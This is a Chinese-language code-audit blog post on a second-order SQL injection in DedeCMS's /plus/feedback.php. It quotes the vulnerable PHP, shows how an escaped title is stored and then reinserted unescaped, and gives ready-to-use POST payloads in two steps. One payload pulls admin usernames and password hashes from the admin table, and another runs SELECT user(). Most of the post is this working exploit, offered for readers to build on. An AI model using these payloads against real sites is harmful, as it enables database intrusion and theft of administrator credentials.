代码审计:DEDECMS通杀鸡肋注入一枚附利用方法

漏洞文件:/plus/feedback.php

if($comtype == 'comments') //问题从这里开始{$arctitle = addslashes($title);//$title 是关键 没有初始化 addslashes转义了我们的$title 比如我们传入1' $arctitle=1\&;$typeid = intval($typeid); //这些都是打酱油的$ischeck = intval($ischeck);//这些都是打酱油的$feedbacktype = preg_replace("#[^0-9a-z]#i", "", $feedbacktype);if($msg!='') //$msg 如果不为空 继续往下走{ $inquery = "INSERT INTO `dede_feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); "; 
//$arctitle 被带入到$inquery 这个sql 语句中 我们来看看效果 

继续看代码往下走

$rs = $dsql->ExecuteNoneQuery($inquery); //ExecuteNoneQuery发送sql 语句//思考 既然$inquery insert 到数据库后$arctitle 的值没有被转义 我们应该想办法利用啊 继续往下看if(!$rs) //这些都是打酱油的{ShowMsg(' 发表评论错误! ', '-1');exit();}}}//引用回复elseif ($comtype == 'reply') //第二个关键{$row = $dsql->GetOne("SELECT * FROM `dede_feedback` WHERE id ='$fid'");//看这sql 语句//SELECT * FROM `dede_feedback` WHERE id ='$fid' 查询的不就是我们刚刚insert的表么 $fid是get传过来的

往下看

$arctitle = $row['arctitle']; //看到这里你激动了么 直接取数据库里面arctitle 字段的值给$arctitle 看看$arctitle 被带入到哪里了$aid =$row['aid'];//这些都是打酱油的$msg = $quotemsg.$msg;//这些都是打酱油的$msg = HtmlReplace($msg, 2);//这些都是打酱油的$inquery = "INSERT INTO `dede_feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";//$arctitle 被带入到 $inquery 这里 我们构建下语句 echo $inquery 看看

$dsql->ExecuteNoneQuery($inquery);//这里用ExecuteNoneQuery发送sql 语句 我们看看这个函数吧/** //执行一个不返回结果的SQL语句,如update,delete,insert等function ExecuteNoneQuery($sql=”){…}* 不返回结果的 没办发报错 我们只能构建其他的exp了* 想法1:* 我们在第一次insert的时候构建$arctitle=1,@`’`,1,1,1,1,1,1,1,(SELECT concat(uname,0x5f,pwd,0x5f) FROM `%23@__admin` limit 0,1)),(1,1,1,’1* http://localhost/dede/uploads/plus/feedback.php* post* action=send&comtype=comments&aid=16&isconfirm=yes&feedbacktype=feedback&face=1&msg=33333&notuser=1&validate=gram&typeid=12&title=1,@`’`,1,1,1,1,1,1,1,(SELECT concat(uname,0x5f,pwd,0x5f) FROM `%23@__admin` limit 0,1)),(1,1,1,’1** 然后 在取出的时候 第2条sql 语句应该就变成了:* INSERT INTO `dede_feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES (’16′,’0′,’游客 ‘,’1,@`’`,1,1,1,1,1,1,1,(SELECT concat(uname,0x5f,pwd,0x5f) FROM `%23@__admin` limit 0,1)),(1,1,1,’1′,’127.0.0.1′,’1′,’1362649019′,’0′,’0′,’0′,’feedback’,’0′,”)

/* 本次审计到这里结束了 最后给出的exp是 只能select user() 大牛们可以开拓思维想想 有没别的招* 第一次post的语句* http://localhost/dede/uploads/plus/feedback.php* post*

action=send&comtype=comments&aid=13&isconfirm=yes&feedbacktype=feedback&face=1&msg=22222&notuser=1&validate=gram&typeid=12&title=',@`'`,1,1,1,1,1,1,1,(SELECT user())),(1,

* 第2次post的语句 //aid 要和上面的一样 fid 前面有说* http://localhost/dede/uploads/plus/feedback.php*

action=send&comtype=reply&aid=13&isconfirm=yes&feedbacktype=feedback&validate=upse&fid=9

*/

发光并非太阳的专利,你也可以发光

代码审计:DEDECMS通杀鸡肋注入一枚附利用方法

相关文章:

你感兴趣的文章:

标签云: